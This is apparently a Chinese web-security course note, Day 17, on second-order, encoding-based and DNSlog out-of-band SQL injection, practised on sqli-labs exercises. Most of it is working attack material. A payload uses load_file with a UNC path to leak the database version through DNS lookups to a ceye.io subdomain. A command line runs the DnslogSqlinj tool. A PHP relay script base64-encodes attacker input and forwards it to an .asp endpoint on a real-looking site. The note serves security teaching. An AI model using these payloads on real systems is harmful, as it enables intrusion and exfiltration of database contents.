WEB漏洞-二次,加解密,DNS等注入

    第17天:WEB漏洞-SQL注入之二次,加解密,DNS等注入 - 图1
    #加解密,二次,DNSlog注入
    注入原理,演示案例,实际应用(中转注入)

    DNSlog:解决了盲注不能回显数据,效率低的问题
    http://127.0.0.1:8080/sqlilabs/less-2/?id=-1 and if((select load_file(concat(‘\\‘,(select version()),’.1t7i2f.ceye.io\abc’))),1,0)—+

    D:\Python27\python.exe dnslogSql.py -u “http://127.0.0.1:8080/sqlilabs/Less-9/?id=1‘ and ({})—+”
    第17天:WEB漏洞-SQL注入之二次,加解密,DNS等注入 - 图2

    演示案例:
    ² sqlilabs-less21-cookie&加解密注入(实际案例)
    ² sqlilabs-less24-post登陆框&二次注入(实际案例)
    ² sqlilabs-less9-load_file&dnslog带外注入(实际案例)
    ² py-DnslogSqlinj-dnslog注入演示脚本演示(实际案例)

    涉及资源:
    http://ceye.io/
    https://github.com/ADOOO/DnslogSqlinj
    <?php
    $url=’http://xxxx/job_bystjb/yjs_byszjs.asp?id=‘;
    $payload=base64_encode($_GET[‘x’]);
    echo $payload;
    $urls=$url.$payload;
    file_get_contents($urls);
    echo $urls;
    ?>